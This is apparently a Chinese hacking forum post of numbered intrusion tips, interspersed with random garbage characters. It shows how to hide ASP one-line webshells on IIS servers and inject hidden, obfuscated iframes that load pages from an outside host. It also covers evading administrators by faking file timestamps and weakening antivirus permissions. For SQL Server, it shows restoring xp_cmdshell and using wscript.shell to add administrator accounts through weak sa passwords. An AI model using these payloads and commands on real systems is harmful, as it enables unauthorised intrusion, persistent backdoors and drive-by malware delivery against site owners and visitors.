1、建立非标准目录:mkdir images..\; N5 V" W- W$ S! Q% E6 o; @
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
. j. ?: c) I! M& h0 X* E0 z# ^, k9 t通过web访问ASP木马:http://ip/images../news.asp?action=login
3 R9 k! I4 C k' T) c4 Y如何删除非标准目录:rmdir images..\ /s
- L% p/ V7 b& r2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:0 |+ c% Q* H3 C. F
mkdir programme.asp
5 }' a/ g/ }( C/ R0 {1 J) r3 A新建1.txt文件内容:<!--#include file=”12.jpg”-->
8 x5 K+ M# a( A5 ~9 j% y新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
! W- R* d6 o M1 N( [+ \/ ^. Aattrib +H +S programme.asp
( z6 @& h% i1 k* X* n通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt8 w" O: L5 s7 {" J" L: K$ Q8 K
( [7 ~* h: l- k) W& i3 V
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。' d% E4 J) i/ \/ \6 F
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。- N- l v; f% Y, L- I3 D7 w
: _$ _' Z, l( g f
55、JS隐蔽挂马3 p1 }2 b8 K+ {' f& I8 `/ |/ c
1.4 x$ ]) _5 P/ r3 x1 q
var tr4c3="<iframe src=ht";
# [1 I4 D* @6 l3 b2 ~tr4c3 = tr4c3+"tp:/";
$ l) q0 j( p% D7 Itr4c3 = tr4c3+"/ww";
: r9 _+ ~/ E% W7 c5 T3 Vtr4c3 = tr4c3+"w.tr4";0 Z; W8 G& k2 \) D
tr4c3 = tr4c3+"c3.com/inc/m";2 y$ e! p* C$ I6 Y( {6 x; c
tr4c3 = tr4c3+"m.htm style="display:none"></i";
5 b* p! r1 p. C+ f5 }! u4 \2 f* O# Atr4c3 =tr4c3+"frame>'";8 |, K" _$ |2 l3 k x1 v+ z
document.write(tr4c3);) X7 `$ F4 i, q' B! b
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
$ ~( n6 i ~; Z# P
) g8 Z1 F" i3 e6 ?6 n N1 ~2.0 x I% `( D" ^4 t
转换进制,然后用EVAL执行。如
8 x: W" @+ T X* \/ J6 G1 C- d/ Ceval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");" ^0 S7 {& h& B# U
不过这个有点显眼。
9 V* Z( _- X$ V9 T F3.6 ^+ ]! X8 Q9 u0 ]( K1 w
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');; Z4 l7 `+ c3 I' x+ W5 _5 u6 `* ?* C9 z
最后一点,别忘了把文件的时间也修改下。1 B4 ?' u8 u" S# T9 T8 P
+ R% I+ m, h: T& U56.3389终端入侵常用DOS命令) b, ` h- f0 |& d
taskkill taskkill /PID 1248 /t
- B+ A A: {! [
) J, b' i+ u9 ttasklist 查进程# o% B* e- K* x/ J$ u- o' _2 N
0 f; R5 i5 K* x
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
6 T2 _& k9 m( q# ^. q% P9 ^iisreset /reboot
0 z8 v6 Z b; H7 N+ Ltsshutdn /reboot /delay:1 重起服务器
* A' ^% G! W$ ~: ?0 m( t7 W9 k. M" u g+ ?% m. h2 Q
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
( h: B0 v( `, k8 U5 v( V9 `! Q
! z+ d$ s) [- O7 w! lquery user 查看当前终端用户在线情况
6 w2 y5 K; b- q" z! h/ S0 @6 m V* T+ B
要显示有关所有会话使用的进程的信息,请键入:query process *+ D8 N- P0 ?# k, v1 [: t
& B- F' H& _, j* t要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:20 f* j( ?# @/ _2 J3 n
9 K. d# r( i' G2 G. ~要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
! [& T5 K& j) R0 z, r& N
) c+ i( O1 D% H4 f2 Y/ ?/ q% |要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM026 f4 g2 Z# f* H* [
[ o- E% n+ A% h6 [命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
( X5 k, w3 l4 d! \. E6 L: f; P0 m' C' l5 l! X7 [0 R/ G. T: t% u- j
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统1 p6 ^6 a: m8 U4 w0 F1 ?
% N; O; u1 o; H8 n6 ?" Y
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
, b( H: Y, \' K
3 y! o9 W+ C- X6 k8 y. x& ?5 m命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机/ F, I0 C3 S' L& h0 Y- U1 ~
, d- W& {" G6 h- a56、在地址栏或按Ctrl+O,输入:5 O+ V8 _. L+ L& L7 P
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
4 z1 H3 [8 n8 C# M7 W. r9 ~6 y6 C) p2 o2 I: w4 t/ W
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
2 N% L4 J3 r( a& S
0 g! T# {9 {& w( r57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
# o; a: H4 k1 F% y4 W/ l! ?; q+ K用net localgroup administrators是可以看到管理组下,加了$的用户的。
0 L n5 z$ ?: }6 X4 i* ]" {
9 y# x, {5 L5 |! E/ i58、 sa弱口令相关命令: H% R3 v, h/ e
5 a" L4 j: v9 M7 M6 z, L4 V; h一.更改sa口令方法:
! Q3 @% \% x0 S2 {6 @用sql综合利用工具连接后,执行命令:6 L& i+ {# t" T. k/ |1 e( J
exec sp_password NULL,'20001001','sa' \6 Q3 C6 p0 W7 ]% D
(提示:慎用!)
, l2 p: e* s( d
4 m' m9 W4 R8 k n5 `5 M4 m二.简单修补sa弱口令.
+ s1 I# }9 v- H. Y0 Q
+ Z% L0 l$ N/ z* Q方法1:查询分离器连接后执行:
/ ]6 P$ F" K* m9 h' Hif exists (select * from2 m0 t0 p& Z9 V5 F1 y( S5 n/ G& E
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
4 m* z, |1 L: [: t6 L5 }% fOBJECTPROPERTY(id, N'IsExtendedProc') = 1), @9 n% l' |. ?* n0 v
" ], I8 y" J. B+ J( p2 T9 [& |exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
]( M* S* i# v' k8 P2 `: e- U
8 b4 y0 u4 |) g: d v3 ?& UGO& |; {! D% \$ E9 ?6 y6 [, J
4 Y5 o9 f! L! l: s然后按F5键命令执行完毕. S- g* i |+ C5 _6 V7 P0 B5 Z
% M6 N: ]4 z9 R& r) O- @8 M! ~
方法2:查询分离器连接后
% O# c- `. b5 q% M4 Q$ x* v第一步执行:use master
- t3 e5 v; V6 S: `. X9 j第二步执行:sp_dropextendedproc 'xp_cmdshell'
$ O C! x6 o$ N5 H2 H) n$ c然后按F5键命令执行完毕* N! D) L6 [7 \5 ~
0 R$ P1 K$ [2 n$ r3 T& o0 f
' \+ E9 a& p6 c% d4 y: `
三.常见情况恢复执行xp_cmdshell.( e4 x8 w0 x, V5 m
, h1 `) \4 _; J; @6 O4 r. Q3 E6 M& W$ K
1 未能找到存储过程'master..xpcmdshell'.
& X; p% ~( V, j/ R 恢复方法:查询分离器连接后,: ~ r9 O5 R) e+ ^
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int$ h. }; u; \+ ?$ T( ]- y! I# k
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% [' u+ ^- m5 g0 S% ?$ [+ n* D, L然后按F5键命令执行完毕: n2 I' p# a; j) |% P, I& j% D* c
. a l; S& G l+ T; X2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
! B) e+ G% H9 s# C& [恢复方法:查询分离器连接后,, z1 P, E5 E" R& l
第一步执行:sp_dropextendedproc "xp_cmdshell"+ |4 U0 _2 Q! J0 ?
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'& q5 x3 x) d6 H1 \
然后按F5键命令执行完毕
' N( U+ e1 f$ q* u& F, i; Z4 N. C4 l
5 \! E) ~) V7 C3 w3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
6 P6 C& |* F! \% f, A; Y恢复方法:查询分离器连接后,
! k7 c: w5 [7 I( j& ?$ T# n第一步执行:exec sp_dropextendedproc 'xp_cmdshell'* P! c3 q' t* l/ \
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
/ ?& E K( \ h9 O$ l4 E- G然后按F5键命令执行完毕
: P# X4 E: ?# D$ V
$ S4 i! m; ~4 J7 F4 u( Z9 J四.终极方法.( ], ~$ j1 l7 m2 ?2 B% p/ c
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:: _( O/ E" \( t O! }& E4 {
查询分离器连接后,! U7 `$ h. j# W+ T6 P4 s
2000servser系统:, J6 s H7 Z( J2 a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
* X. z' h$ ^" r7 ]) _6 J' e+ \1 ^9 H$ h9 j: Q5 U. x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
& X. U4 I# F2 H+ x* b3 P. U+ d8 q5 G$ |* ~6 b2 w! R% e, @& h
xp或2003server系统:
4 ]4 _, @: O. C3 f5 J; a y$ w. K0 c! _0 _7 X
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. Q6 q4 }) i! e3 b% t% |
: ?! _$ U% g0 e# w1 hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. m% n7 {4 M8 a* h( q |
发表于 2012-9-15 14:51:03
收藏
支持
反对